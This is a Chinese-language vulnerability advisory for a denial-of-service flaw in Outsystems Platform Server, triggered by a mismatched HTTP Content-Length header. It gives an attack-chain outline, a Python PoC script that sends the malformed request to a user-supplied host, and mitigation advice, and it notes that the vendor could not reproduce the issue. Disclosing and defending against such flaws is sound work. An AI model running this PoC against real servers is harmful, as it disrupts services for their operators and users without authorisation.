CVE-2025-61258 Outsystems Platform Server拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-61258

漏洞类型

拒绝服务(DoS)

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Outsystems Platform Server

漏洞概述

CVE-2025-61258是Outsystems Platform Server 11.18.1.37828版本中的一个拒绝服务漏洞。该漏洞允许远程未认证攻击者通过发送精心构造的HTTP请求来触发服务中断。具体来说，攻击者可以利用content-length头部值与实际请求体长度不匹配的缺陷，使得服务器在处理异常数据时陷入异常状态或资源耗尽，从而导致服务不可用。此漏洞的CVSS评分为7.5，属于高危级别，攻击复杂度低且无需任何认证或用户交互即可实现。漏洞于2025年12月9日被披露，但供应商表示无法重现此问题。该漏洞影响Outsystems平台的服务器组件，可能对依赖该平台构建企业应用的用户造成业务中断风险。攻击成功后，服务器可能变得无响应，需要手动重启才能恢复正常服务。

技术细节

该漏洞存在于Outsystems Platform Server的HTTP请求处理逻辑中。当服务器接收到HTTP请求时，会根据content-length头部指定的值来读取请求体的数据。然而，攻击者可以构造一个content-length值与实际发送的请求体长度不匹配的请求。例如，设置content-length为一个极大的数值，而实际只发送少量数据，或设置content-length值小于实际数据长度。这种不匹配会导致服务器在等待数据或处理缓冲区时出现异常。服务器可能陷入无限等待状态、内存耗尽或触发断言失败，最终导致进程崩溃或服务无响应。由于攻击无需认证且可以通过网络远程实施，攻击者可以批量对服务器发送此类恶意请求，实现大规模拒绝服务攻击。建议在Web应用防火墙层面实施请求验证，确保content-length与实际请求体长度一致。

攻击链分析

STEP 1

步骤1

攻击者识别目标Outsystems Platform Server的HTTP端点，通常为Web应用入口或API网关

STEP 2

步骤2

构造恶意HTTP请求，设置Content-Length头部为一个极大值（如999999），但实际只发送少量数据

STEP 3

步骤3

发送恶意请求到目标服务器，触发服务器等待接收声明长度但实际不存在的数据

STEP 4

步骤4

服务器陷入等待状态或因内存缓冲区分配异常导致进程资源耗尽

STEP 5

步骤5

服务器无响应或崩溃，需要手动重启才能恢复服务，实现拒绝服务攻击效果

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import time

def exploit_cve_2025_61258(target_host, target_port=80):
    """
    CVE-2025-61258 PoC - Outsystems Platform Server DoS
    This PoC demonstrates the Content-Length mismatch vulnerability
    """
    
    # Craft HTTP request with mismatched Content-Length
    payload = "POST / HTTP/1.1\r\n"
    payload += "Host: " + target_host + "\r\n"
    payload += "Content-Length: 999999\r\n"  # Large value
    payload += "\r\n"
    payload += "test"  # Only 4 bytes sent
    
    print(f"[*] Sending malicious request to {target_host}:{target_port}")
    print(f"[*] Content-Length header: 999999, Actual body: 4 bytes")
    
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        sock.connect((target_host, target_port))
        sock.send(payload.encode())
        
        # Wait and check if server responds
        time.sleep(2)
        sock.send(b"X\r\n\r\n")  # Send more data to trigger timeout
        
        print("[+] Request sent successfully")
        print("[*] Server may hang or timeout waiting for remaining data")
        
        sock.close()
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    target = input("Enter target host: ")
    exploit_cve_2025_61258(target)

影响范围

Outsystems Platform Server 11.18.1.37828

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1）配置Web服务器或负载均衡器的请求超时限制，将超时时间设置为一个较短的值（如30秒）；2）在WAF上实施规则，检测Content-Length与实际请求体长度不匹配的请求并拒绝；3）限制单个连接的请求体大小上限；4）启用服务器健康监控和自动告警机制；5）对关键业务实施多节点部署，确保单点故障不会导致服务完全中断。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-61258
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-61258
3 Details https://www.cvedetails.com/cve/CVE-2025-61258/
4 VulDB https://vuldb.com/cve/CVE-2025-61258
5 Link https://balwurk.com/
6 Link https://balwurk.github.io/CVE-2025-61258/
7 Link https://www.outsystems.com/